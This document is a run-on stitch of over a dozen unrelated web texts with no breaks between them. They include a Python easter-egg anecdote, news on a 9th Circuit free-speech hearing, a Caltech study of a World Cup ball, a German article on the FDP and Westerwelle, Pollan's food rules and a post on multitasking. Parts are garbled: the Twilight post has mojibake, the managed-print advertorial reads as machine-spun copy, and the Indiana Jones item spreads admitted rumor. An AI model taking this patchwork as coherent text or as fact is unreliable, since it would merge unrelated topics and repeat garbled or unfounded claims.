I saw the potential for a great , Michael Jackson - esque t- shirt .
As soon as we'd chosen " import this " I realized we just had to implement it .
Python 2.2 was about to be released and I proposed that we turn off check - in notifications and sneak in a " this. py " module which when imported just printed the Zen of Python .
Tim or Guido suggested further that we rot13 the contents of the module just for a little extra obfuscation , and we told no one outside our little group .
According to my intergoogles spelunking , as soon as IPC 10 was concluded , we commemorated the event by committing this .py to what was to become Python 2.2.1 , thus adding to the affront of new features in point releases .
IIRC , it took a long time for someone to find our little easter egg .
That was all back in the day when the Python community had a sense of humor .
In the usually decorous environs of a full federal appeals court hearing , 11 black - robed judges Tuesday provoked surprised laughter as they debated whether an activist ’s Nazi salute to the mayor of Santa Cruz was an act of free speech or a disruption of public order .
“ It ’s OK to give the finger to a police officer , ” Judge Stephen Reinhardt noted helpfully , citing a previous ruling within the U.S. 9th Circuit Court of Appeals .
Judge M. Margaret McKeown asked the Santa Cruz city attorney if boisterous positive expressions — mugging gleefully and pumping two thumbs up — at City Council meetings would also violate the rules of order .
“ Is smiling OK ? ” Chief Judge Alex Kozinski asked with palpable sarcasm , one of many questions from the judges that hinted at concern about the constitutionality of Santa Cruz ’s policies that led to the eviction and arrest of homeless rights activist Robert Norse eight years ago .
Norse has been fighting the city on 1st Amendment grounds ever since .
The judges , meeting in the formal en banc session in Pasadena , pondered whether use of an obscenity in a public forum would be grounds for ousting the speaker , whether showing disrespect for an official ’s race or gender would be more offensive than Norse ’s silent salute , and what case law exists protecting or proscribing a “ heckler ’s veto . ”
“ When does a Nazi salute move into unprotected territory ? ” Judge Raymond C. Fisher asked Santa Cruz City Atty .
George Kovacevich .
The judge said he was concerned about the city ’s claim to unlimited discretion in controlling expression at public meetings .
“ This is a democracy , ” Fisher reminded the city attorney .
Kovacevich parried a barrage of hypotheticals about what behavior and speech would be permissible at what times and places during public gatherings , eventually conceding that negative expressions tend to rile city officials more than supportive ones .
That prompted Kozinski , a libertarian stickler on individual rights and freedoms , to warn the lawyer that “ You ’re digging yourself in deeper . ”
That was widely seen as a hint at the ruling the court will issue months from now .
In making his point about speakers ’ rights versus spectators ’ rights , Kovacevich unintentionally unleashed hilarity in the courtroom , especially among the judges .
Arguing that the citizen at the lectern during a public hearing can say whatever he or she wants during the allotted time , he said Norse ’s offense was making his gesture of contempt from the sidelines .
“ If I thought you guys as a court were too liberal , ” Kovacevich said by way of example on a speaker ’s latitude to be offensive , evoking the actual impression many conservatives have of the 9th Circuit , “ if I called you SOBs , and MFs and liberal idiots , you might not look disrupted but .... “
“ We might be honored , ” McKeown chimed in , to general merriment .
“ Maybe I ’m making this argument before the wrong court , ” Kovacevich replied , not as amused as the rest of the courtroom .
Seven of the 11 judges hearing the case of Norse vs. City of Santa Cruz were appointed by Democratic presidents .
But even some of the Republican appointees known to chafe under the 9th Circuit ’s liberal image took issue with procedural aspects of the case , which has been moving up and down the federal court ladder since the March 12 , 2002 , council meeting .
“ These guys really nailed them on it , ” Kate Wells , an attorney for Norse , said of the judges ’ questions to Kovacevich that were replete with concern that the public meeting rules were aimed at stifling dissenting views as much as maintaining order .
“ They think we have to sit with our hands in our laps . ”
Norse , an activist with Homeless United for Friendship and Freedom who has been challenging the city ’s restrictions on where the homeless can sleep , said he expects Santa Cruz to petition the U.S. Supreme Court for review if the 9th Circuit decides that his free speech rights were violated .
The high court has a conservative majority — and a track record of overturning a large percentage of 9th Circuit opinions .
carol.williams@latimes.com
A heartless and hulking mugger grabs the purse of a little old lady , flings her to the concrete , walks away and thinks better of it , setting his helpless victim back on her feet -- a shocking crime caught on video .
Now the NYPD is using to that heart - rending and stomach - turning video to bring the punk to justice .
On June 5th in East Harlem , a little 85 - year - old woman was walking in East Harlem in the vicinity of 121 St. around 11:15 a.m. when a man approached her grabbed her purse and dragged her for a bit .
The woman struggled to maintain her balance eventually falling to the sidewalk and striking her head against the concrete bottom of a fence line causing her to release her grip on her cane .
Seeing the woman fall , the alleged assailant walks then proceeds to help the elderly woman up before fleeing the scene .
Officers at the 25th Precinct describe the assailant as a Hispanic male in his 30’s .
According to officials the man is approximately 5 ’ 9 ” tall and appears to be 180 lbs .
He was last seen wearing a white t- shirt and dark colored shorts .
The police ask anyone with information in regards to this incident to call Crime stoppers at 1-800 - 577 - TIPS ( 8477 ) .
You can also submit a tips by logging onto the Crime stoppers website by texting their tips to 274637 ( CRIMES ) then enter TIP577 .
All calls are kept confidential .
ADVANTAGES OF MANAGED PRINT SERVICES
Besides your everyday business objectives , have you ever considered finding out about the advantages of managed print services , and how these services can help further the accomplishment of your organization ?
You may be somewhat new to managed print services and the particular ways managed printing can enable your business to develop .
If so , you ’re in luck , and you ’ve gone to the opportune spot !
How about we start without any preparation and first characterize what managed print services are .
Managed print services ( otherwise called MPS ) are outsourcing services to help deal with your print fleets , for example , printers , copiers , and fax machines .
Putting resources into managed print services is a further step you can take once you ’ve effectively joined forces with a business technology organization .
Reduce Costs And Save Money
An irregular way to deal with your company ’s print set - up can prompt failures in various areas .
Above all else , there are support costs .
Maintaining singular gadgets each , in turn , is costlier than having a computerized , cloud - based framework for doing as such at scale .
Managed print services frequently interface all gadgets to one monitoring framework to guarantee just - in - time delivery of replacement toners and patches .
This utilizes economies of scale by permitting you to mass purchase supplies at a discount .
It additionally decreases the expense related to storing unused stock .
An intensive print review and evaluation can likewise recognize approaches to combine your equipment .
All things considered , having such a large number of gadgets spread around your company will cost more to maintain and use up space and power .
A print master will be able to ascertain the genuine expense of an impromptu approach and distinguish approaches to make savings .
You can see these cost sparing advantages as an MPS client .
During a 100 + site print installation , the networked print framework brought efficiency savings in all cases , including the capacity to save space by sharing networked print capacity with the Subway and Starbucks companies .
You can have the option to smooth out your old cycle of posting day by day invoices , sparing roughly £ 6 - £ 8 a site on postage .
That compares to about £ 34,000 cost savings a year , and that does n’t consider the impressive time - saving advantages .
By and large , the cost savings related to an MPS can be huge contrasted with DIY printer installation and upkeep .
Adjust To Network Changes
Any network connectivity issues identified with your print network are additionally essential for your MPS program .
Regardless of whether it ’s replaced and redesigned workstations or IP address changes for relocated hardware , MPS has the assets to guarantee your print condition is unaffected by these changes .
Boost Efficiency
Imagine a scenario where you needed to part with a dollar each time your printer had a paper jam , ran out of ink , or just would n’t print right .
You ’d be seeing red right away .
Numerous printers in organizations today are slow and inclined to glitch , which burns through your time and cash .
Managed print services wo n’t simply come in and give you an extravagant new printer .
They will investigate the specific needs of your departments to ensure your assets are being utilized wisely and everybody is being provided with the printer that has the capacities they require for examining , duplicating , faxing , and , obviously , printing .
Cooperating with a managed print services provider helps minimize expenses while expanding profitability and increasing productivity .
Comparable to your office printing , you ’ll start to see returns in yearly profits .
You can also visit this website if you ’re looking for a managed print services provider or just looking for advice on your printing efficiency .
The aeronautical engineers at Caltech hold a distinct advantage over all the soccer players and fans who have been complaining about the fancy new ball at the World Cup .
They have a wind tunnel in the basement .
So on Wednesday morning , Beverley McKeon and her colleagues headed downstairs , cranked up the rushing air and turned on the smoke , just like one of those car commercials on television .
In some ways , the assistant professor was asking the same questions voiced by critics who have called the new ball “ tricky ” and “ unpredictable , ” but in a very different language .
Advertisement
Surface roughness .
Planes of symmetry .
Turbulence versus laminar flow .
Speaking over the rumble of a wind generator the size of a school bus , she explained that “ it ’s quite a complex fluid mechanics phenomenon . ”
But what does that mean for the simple act of kicking a ball ?
Adidas produces a new ball for each World Cup and players invariably gripe .
Four years ago , the German sporting goods giant switched from the traditional 32 stitched panels to 14 .
The current Jabulani model -- its name means “ to celebrate ” in Zulu -- is down to eight .
Advertisement
This configuration piqued the curiosity of Caltech professors and graduate students , a multinational group that includes a few soccer fans .
They took the Jabulani and a traditional ball to their lab even as the U.S. scrambled to victory over Algeria .
The Lucas Wind Tunnel can generate monstrous gusts , but in this case they set the dial to about 30 meters per second , simulating the average speed of a ball kicked by an elite player .
Though the testing fell short of comprehensive , McKeon -- an Englishwoman who specializes in the aerodynamics of the sphere -- sensed an important difference in the Jabulani .
In addition to fewer panels , it has comparatively shallow seams for a more perfectly round shape , which might seem like a good thing .
But the science can be counterintuitive .
Advertisement
Consider the history of the golf ball , which was smooth back in the mid-1800s .
“ The Scots learned the hard way , ” McKeon said .
The addition of dimples made for a rougher surface but a narrower wake and less drag , which contributed to straighter , longer trajectories .
To some degree , the Jabulani represents a shift in the opposite direction , even with tiny ridges covering its skin .
Caltech ’s study suggests that it starts with a smooth -- or laminar -- airflow , shifts to something more turbulent , then shifts back again .
Advertisement
These variations can have a big effect .
“ So as the goalkeeper sees the ball coming , it suddenly seems to change its trajectory , ” McKeon said .
“ It ’s like putting the brakes on , but putting them on unevenly . ”
Players will acclimate soon enough , McKeon suspects , but they had only a month to practice with the Jabulani before competition began .
And the new ball sparked immediate debate after the U.S. earned a 1 - 1 tie with England on a seemingly routine shot that somehow squirmed past the keeper .
Was he fooled by laminar flow ?
Were fluid mechanics to blame ?
Advertisement
McKeon the scientist said : “ That ’s a very political question . ”
Then , after a brief pause , McKeon the English fan could not help adding : “ I ’m sure it ’s entirely down to the ball and had nothing to do with our goalkeeper . ”
--
david.wharton@latimes.com
twitter.com/LATimesWharton
The 5th Indiana Jones movie plot has been leaked .
And this time it 's set in the Bermuda Triangle with Shia LaBeouf .
Fingers crossed Spielberg finds a way of " hilariously " punching Mutt in the dick repeatedly once again .
Advertisement
Completely unsubstantiated rumors are circulating out of Music Rooms via TheFilmStage that Indiana Jones 5 will film next year , and will be set in the Bermuda Triangle .
But this time Harrison Ford is merely on " stand - by " and Shia LaBeouf is back , possibly as the main star ?
Then again , Ford could just be " waiting " we 're not 100 % sure what they 're implying .
But after the last movie we 're sure there will be a lot more Mutt this time around .
Music Rooms says that Lucas and Spielberg are almost finished with the script , which a source is claiming will be " an exciting conclusion for the franchise . "
But do n't get too sad , haters of the Crystal Skull — the source is also claiming that the pair insist that this film " wo n't contain lots of state - of - the - art special effects " and will remain true to the original series .
Even if you do n’t like the Twilight series of movies , you have to admit that they know how to construct an excellent official soundtrack .
Especially with their latest release The Twilight Saga – Eclipse , they have been able to get some major names on board such as The Black Keys , Metric , The Bravery , UNKLE , Muse , The Dead Weather and more .
The Twilight people have also managed to persuade talented indie - pop princesses Florence + the Machine , Sia & Bat For Lashes to contribute all new original material .
—
Florenceâ€™s effort comes in the form of Heavy In Your Arms , a dark and brooding number that wouldnâ€™t have sounded out of place on her debut album Lungs .
Florence +
The Machine – Heavy In Your Arms
ytaudio( XWIKfe_bQ58 )
—
My Love comes from Australian sensation Sia , a very different offering when compared with Florenceâ€™s Eclipse contribution .
Itâ€™s a delicate , orchestral ballad that shows just why she is in such high demand as a songwriter these days .
It sounds a bit like another song I know in certain places , but I just ca n’t put my finger on what it is …
Sia – My Love
ytaudio( YWeWxOnra8M )
—
Bat For Lashes does n’t just appear as a solo act on her offering , she has enlisted the help of alternative singer / songwriter Beck .
Haunting vocals from both performers ( Natasha Khan was responsible for the lyrics ) adds to the powerful electronic backing music ( which naturally Beck was in charge of ) .
Beck & Bat For Lashes – Let ’s Get Lost
ytaudio( L9E97qrgsxE )
This recent ad from McDonald 's in France for their " Come as you are " ( " Venez comme vous êtes " ) campaign has gotten a lot of people talking over the past week .
( There 's also a good post about the commercial at French website Yagg , if you can read French — it probably loses something in the automatic English translation . )
The story : a young man sits at a table in McDonald 's while talking on the phone with his classmate / sweetheart and looking at their class photo .
He gets off the phone when his dad comes over with their order .
After seeing his son's class photo , the dad talks about how he was a ladies ' man when he was his son's age — and says it 's unfortunate that his son is in an all - boys school .
Understandably , the ad has received mixed reviews .
Watch the ad after the jump and let us know what you think .
McDonald 's France Gay - Themed Ad
More ' Venez comme vous êtes '
Ads from 2010
All products linked here have been independently selected by our editors .
We may earn a commission on purchases , as described in our affiliate policy .
According to the WSJ , there 's a Federal investigation into Morgan Stanley ( MS ) that echoes the issues involving Goldman Sachs ( GS ) .
Specifically , Federal investors are looking at CDO deals which were labeled after Presidents James Buchanan and Andrew Jackson , and which were nicknamed " Dead Presidents " by traders .
The probe is preliminary , according to the report , and at the level of the Manhattan DA 's office , so we 're talking criminal , not civil from the SEC .
At issue are the same kinds of issues regarding who packaged the CDOs , betting against them , and how the firm 's role was represented to clients .
Read the full report >
And do n't miss :
The complete Goldman Sachs winners and losers >
An der liberalen Basis gärt es : Schuld am Niedergang soll allein Westerwelle sein .
Ein möglicher Nachfolger steht bereit .
Anzeige
Getrieben vom Adrenalin , breitet Guido Westerwelle die Arme aus .
„ Meine Damen und Herren “ , ruft er seiner Partei nach einer feurigen , rhetorisch gewohnt brillanten Rede zu : „ Hier steht die Freiheitsstatue dieser Republik . “
Ovationen im Stehen , die FDP feiert ihren Vorsitzenden und bestätigt ihn mit 88 Prozent der Stimmen im Amt .
Vor exakt drei Jahren war das , im Juni 2007 in Stuttgart .
Gestern gab es wieder einen Parteitag ; in Künzell bei Fulda kamen die Delegierten der hessischen FDP zusammen .
Im Mittelpunkt des Treffens stand ein Antrag des Kreisverbandes Limburg / Weilburg .
„ Die Lage der FDP ist dramatisch “ , heißt es darin .
„ Die Führung der Partei auf Bundesebene hat es mit einer beispiellosen Anhäufung von Fehlern in konzeptioneller , strategischer , taktischer und handwerklicher Hinsicht fertiggebracht , die Partei von einem grandiosen Wahlsieg in eine existenzielle Krise zu führen . “
Das Ziel des Papiers : die Einberufung eines Sonderparteitags im Herbst – und die Ablösung Guido Westerwelles .
„ Die Stimmung an der Basis ist miserabel , viele Mitglieder haben die Nase voll “ , begründet der Limburger Kreisvorsitzende Christoph Müller den Vorstoß .
„ Und wenn jemand für die Fehler der Partei geradestehen muss , ist das selbstverständlich der Vorsitzende . “
Die Freiheitsstatue soll gekippt werden .
Anzeige
Es hat sich viel Frust angestaut seit dem historischen Wahlergebnis von 14,6 Prozent und der Regierungsübernahme in Berlin vor acht Monaten : Der Absturz in den Meinungsumfragen auf fünf Prozent .
Der Abschied vom liberalen Kernversprechen , die Steuern zu senken .
Die Demütigungen des FDP - Gesundheitsministers Philipp Rösler durch den Koalitionspartner CSU .
Und das Gefühl , die FDP - Regierungsmitglieder , allen voran der Vizekanzler Westerwelle , würden von Bundeskanzlerin Angela Merkel regelmäßig vorgeführt .
Der hessische Landeschef Jörg - Uwe
Hahn beklagt in seiner Rede in Künzell die „ Disziplinlosigkeiten in Berlin “ .
Auch im Vorfeld des Parteitags hat er wenig getan , um den Antrag aus Limburg zu stoppen .
Im Gegenteil : Er holzte kräftig gegen Westerwelle .
Mehrfach zweifelte er an , dass der „ dem Parteivorsitz und dem Amt des Außenministers gleichzeitig gerecht werden kann “ .
Den letzten Schritt aber , die Zustimmung zum Antrag , geht er wie die Mehrheit der Delegierten nicht .
„ Dieser Antrag ist kein Aufstand , sondern ein Hilferuf der Basis , endlich dafür zu sorgen , dass liberale Positionen auf Bundesebene durchgesetzt werden “ , sagt Klaus - Jürgen Hoffie , Hessens ehemaliger Wirtschaftsminister .
Und Christopher Hörst aus dem Kreis Bergstraße ergänzt : „ Der Antrag geht aus einem einzigen Grund nicht : Man kann einer Person nicht monatelang zujubeln und dann ihren Kopf fordern . “
Es gärt in der Partei , nicht nur in Hessen .
Von Nord bis Süd , von West bis
Ost fallen die Hemmungen , der wachsenden Wut an der Basis ein Ventil zu schaffen .
Und am leichtesten geht das eben mit Kritik an Westerwelle .
In Schleswig - Holstein wirft der Fraktionschef Wolfgang Kubicki dem Parteichef vor , er tauche ab .
In Bayern beklagt Generalsekretärin Miriam Gruß , die FDP sei nicht mehr als eigenständige Partei erkennbar .
Und in Sachsen wollen sie dem Vorsitzenden gar die Gefolgschaft in der Bundesversammlung verweigern .
Anzeige
Bei der Wahl des Bundespräsidenten am 30 .
Juni werden die drei Wahlmänner aus dem Freistaat nicht für den schwarz - gelben Kandidaten Christian Wulff stimmen , sondern für den rot -grünen Vorschlag Joachim Gauck .
Er habe sich die Sache nicht leicht gemacht , sagt der Landesvorsitzende Holger Zastrow .
„ Aber das überwältigende Votum meiner Landespartei und die unzähligen Gespräche , Briefe und E - Mails aus der Bevölkerung haben mich in meiner Entscheidung bestärkt : Ich werde meine Stimme Joachim Gauck geben . “
Derzeit lässt sich mit der FDP , so scheint es , nur mittels Aufbegehren gegen Westerwelle Staat machen .
Natürlich weiß der Vorsitzende um die verheerende Stimmung in seiner Partei .
Wer den Vizekanzler in diesen Tagen trifft , erlebt einen ausgezehrt und nachdenklich wirkenden Politiker .
Er räumt freimütig ein , Fehler gemacht und sich das Regieren weniger belastend vorgestellt zu haben .
Ein Aufgeben aber kommt für ihn nicht infrage , und auch eine Trennung von Parteivorsitz und Ministeramt schließt Westerwelle kategorisch aus .
Dann wäre er in der Koalition gegenüber Angela Merkel und Horst Seehofer , die beide ebenfalls Regierungs - und Parteiamt in sich vereinen , gar nicht mehr durchsetzungsfähig , argumentiert er .
Allerdings sieht er durchaus die Notwendigkeit , sich auf seine Partei zuzubewegen .
Westerwelle mache gerade eine Metamorphose durch , findet ein Vertrauter aus der Fraktion : „ Er will diese Koalition unbedingt , dafür ist er auch bereit , eine Zäsur an sich selbst vorzunehmen . “
Erstes Ergebnis dieser Wandlung ist , dass Westerwelle seine öffentlichen Auftritte derzeit auf Regierungstermine beschränkt .
Mit innenpolitischen Polarisierungen hält er sich zurück .
Stattdessen telefoniere er viel mit den Landesverbänden , heißt es in seinem Umfeld .
Anzeige
Und am Mittwochabend traf er sich erstmals seit der Regierungsübernahme mit jenen rund 40 Abgeordneten der Fraktion , die im September neu in den Bundestag gewählt worden waren .
Bei Wein und Bier im Thomas - Dehler - Haus lernten viele dieser Parlamentarier Westerwelle erstmals persönlich kennen .
Und sie nahmen kein Blatt vor den Mund : Der Chef bekam Klagen über die Union , über die Dauerkrise der Regierung , über den fehlenden Korpsgeist zu hören .
Die Stimmung habe sich seit der Wahl „ in Rekordtempo von Euphorie über Ernüchterung zu Enttäuschung gewandelt “ , sagte ein Teilnehmer des Treffens .
Was sich keiner traute zu sagen : Seit geraumer Zeit kursiert schon ein konkretes Modell unter einzelnen Abgeordneten , wie das Problem zu beheben ist .
Die fähigste Ministerin der FDP , Sabine Leutheusser - Schnarrenberger , solle als Übergangslösung den Parteivorsitz übernehmen .
Mittelfristig könne dann Christian Lindner inthronisiert werden .
Dem Generalsekretär , 31 Jahre alt und ebenfalls Bundestagsneuling , trauen die meisten am ehesten die intellektuelle und strategische Fähigkeit zu , der neue FDP - Frontmann zu werden .
Lindner ist klug genug , diese Gedankenspiele ins Reich der Fabel zu verweisen .
Seine Lösung sieht anders aus .
Einerseits steht er loyal zu Westerwelle und bemüht sich , das bröckelnde Denkmal zu stützen .
Anderseits will er der Partei einen sanften Kurswechsel verordnen : weg vom Steuersenkungsminimalismus des Vorsitzenden , hin zu einem Freiheitsbegriff , der auch den Feuilletons intellektuelle Nahrung bietet und es der Partei erleichtert , abseits der Finanzpolitik Themen zu besetzen .
Nebenbei sollen so neue Koalitionsoptionen jenseits der Union geschaffen werden .
Die ersten Eckpfeiler will Lindner am kommenden Wochenende auf der Vorstandsklausur der FDP einrammen .
Dort soll eine Handvoll Themenfelder festgelegt werden , auf denen sich kurzfristig Profil gewinnen lässt – und zwar „ koalitionskompatibel “ , wie Lindner sagt .
Dann wird der Generalsekretär den Radikalumbau der Parteizentrale verkünden .
Das Dehler - Haus soll , frei nach Peter Sloterdijk , ein „ Büro für Visionen “ werden , mit neuen Abteilungen für Programm , Planung und Analyse .
Und schließlich soll die Debatte über ein neues Grundsatzprogramm beginnen .
Ohne Widerstand wird das nicht abgehen .
Finanzpolitische Puristen lassen schon verlauten , die von Lindner angestrebte sozialere Ausrichtung der Partei sei „ kein Mainstream in der FDP “ , sondern „ Kuschelpolitik “ .
Man müsse es aushalten , „ dass nicht 90 Prozent der Leute FDP wählen “ .
Auch die Öffnung hin zur Sozialdemokratie gestaltet sich schwierig .
Lindner hatte darauf hingewirkt , dass sein Heimatverband Nordrhein - Westfalen Sondierungsgespräche mit SPD und Grünen über eine Ampelkoalition führte .
Doch nicht nur die scheiterten .
Landeschef Andreas Pinkwart will die nun anstehende rot-grüne Minderheitsregierung „ mit allen Mitteln der Opposition bekämpfen .
Wir können doch diesen Linksruck in NRW nicht auch noch unterstützen “ , sagte er der „ Welt am Sonntag “ .
Weder bei der Wahl der Ministerpräsidentin Hannelore Kraft noch bei künftigen Sachentscheidungen des Landtags werde es eine Zusammenarbeit geben .
Damit festigt Pinkwart bis auf Weiteres das alte Lagerdenken Westerwelles : Bürgerliche stehen gegen einen Linksblock .
Lindner weiß , dass das schon in Rheinland - Pfalz , das im März 2011 wählt , ganz anders aussehen kann .
Dort ist eine Koalition aus SPD und FDP eine realistische Option .
Allerdings nur , falls die FDP sich bis dahin aus ihrem Umfragetief befreien kann .
Und diese Aufgabe , das ist Westerwelle wie Lindner klar , lässt sich nur gemeinsam bewältigen .
The ground is now literally shaking around Iceland 's Mt. Katla .
If that blows , look for Bund spreads to promptly catch up with Greek ones .
h/t Rusty Shorts
Rules to Eat By
Every trip to the supermarket these days requires us to navigate what has become a truly treacherous food landscape .
I mean , what are we to make of a wonder of food science like the new Splenda with fiber ?
( “ The great sweet taste you want and a little boost of fiber . ” )
Should we call this progress ?
Is it even food ?
And then , at the far other end of the nutritional spectrum , how are we to process ( much less digest ) the new , exuberantly caloric Double Down sandwich that KFC has introduced ?
This shameless exaltation of dietary fat actually redefines the very concept of a sandwich by replacing the obligatory bread with two slabs of fried chicken kept some distance apart by strips of bacon , two kinds of cheese and a dollop of sauce .
Deciding what to eat , indeed deciding what qualifies as food , is not easy in such an environment .
When Froot Loops can earn a Smart Choices check mark , a new industrywide label that indicates a product ’s supposed healthfulness , we know we ca n’t rely on the marketers , with their dubious health claims , or for that matter on the academic nutritionists who collaborate on such labeling schemes .
( One of them defended the inclusion of Froot Loops on the grounds that they are better for you than doughnuts .
So why does n’t the label simply say that ? )
Making matters worse , official government pronouncements about eating are n’t necessarily much more reliable , not when the food industry influences federal nutrition guidelines .
But even when the “ best science ” prevails , that science can turn out to be misguided as when the official campaign against saturated fat got us to trade butter for stick margarine loaded with trans fats , a solution that turned out to be worse than the problem .
If we ca n’t rely on the marketers or the government or even the nutritionists to guide us through the supermarket woods , then who can we rely on ?
Well , ask yourself another question :
How did humans manage to choose foods and stay healthy before there were nutrition experts and food pyramids or breakfast cereals promising to improve your child ’s focus or restaurant portions bigger than your head ?
We relied on culture , which is another way of saying : on the accumulated wisdom of the tribe .
( Which is itself another way of saying : on your mom and your friends . )
All of us carry around rules of thumb about eating that have been passed down in our families or plucked from the cultural conversation .
Think of this body of food knowledge as samizdat nutrition : an informal , unsanctioned way of negotiating our eating lives that becomes indispensable at a time when official modes of talking about food have suffered a serious loss of credibility .
Earlier this year I began gathering examples of these rules , or personal food policies , for a short book I ’m publishing in January .
My premise is that for all the authority we grant to science in matters of nutrition , culture still has a lot to teach us about how to choose , prepare and eat food , and that this popular wisdom is worth preserving — perhaps today more than ever , in this era of dazzling food science , supersize portions and widespread dietary confusion .
In March , I posted a request for readers ’ rules about eating on Well , Tara Parker - Pope ’s health blog on nytimes.com .
Within days , I received more than 2,500 responses — more than any Well post had ever received .
My aim was to collect genuinely useful , and nutritionally sound , examples of popular wisdom about eating .
I found some for my book , but I also found something else — a banquet of food policies that even when they made little , if any , nutritional sense ( and therefore did n’t belong in the book ) nevertheless opened a window on our current thinking about food : the stories we tell ourselves , the games we play and the taboos we invoke to organize our eating lives .
Some of the rules have stood the test of time and have been confirmed by science , but all of them have something to teach us about our continuing efforts to pick a healthful and happy path through the minefields of the modern - food marketplace or restaurant menu .
Read my favorites here :
www.nytimes.com/interactive/2009/10/11/magazine/20091011-foodrules.html
In Quality Software Management : Systems Thinking , Gerald Weinberg proposed a rule of thumb to calculate the waste caused by project switching :
Even adding a single project to your workload is profoundly debilitating by Weinberg 's calculation .
You lose 20 % of your time .
By the time you add a third project to the mix , nearly half your time is wasted in task switching .
This can be a problem even if you 're only working on a single project at any time .
The impact of simply letting your email , phone , and instant messaging interrupt what you 're doing can be profound , as documented in this BBC study :
The study , carried out at the Institute of Psychiatry , found excessive use of technology reduced workers ' intelligence .
Those distracted by incoming email and phone calls saw a 10 - point fall in their IQ - more than twice that found in studies of the impact of smoking marijuana , said researchers .
Kathy Sierra wrote a great post comparing multi-tasking and serial tasks and followed it up a year later with a typically insightful post proposing that multi-tasking makes us stupid :
Perhaps the biggest problem of all , though , is that the majority of people doing the most media multitasking have a big-ass blind spot on just how much they suck at it .
We believe we can e-mail and talk on the phone at the same time , with little or no degradation of either communication .
We believe we can do homework while watching a movie .
We believe we can surf the web while talking to our kids / spouse / lover / co-worker .
But we can 't !
Not without a hit on every level – time , quality , and the ability to think deeply .
Joel Spolsky compares the task switching penalty for computers and computer programmers :
The trick here is that when you manage programmers , specifically , task switches take a really , really , really long time .
That 's because programming is the kind of task where you have to keep a lot of things in your head at once .
The more things you remember at once , the more productive you are at programming .
A programmer coding at full throttle is keeping zillions of things in their head at once : everything from names of variables , data structures , important APIs , the names of utility functions that they wrote and call a lot , even the name of the subdirectory where they store their source code .
If you send that programmer to Crete for a three week vacation , they will forget it all .
The human brain seems to move it out of short - term RAM and swaps it out onto a backup tape where it takes forever to retrieve .
I 've often pushed back on demands to work on multiple projects at the same time .
It can be difficult to say no , because software developers are notoriously prone to the occupational hazard of optimism .
We typically overestimate how much we 'll actually get done , and multi-tasking exaggerates our own internal biases even more .
Whenever possible , avoid interruptions and avoid working on more than one project at the same time .
If it 's unavoidable , be brutally honest with yourself – and your stakeholders – about how much you can actually get done under multi-tasking conditions .
It 's probably less than you think .
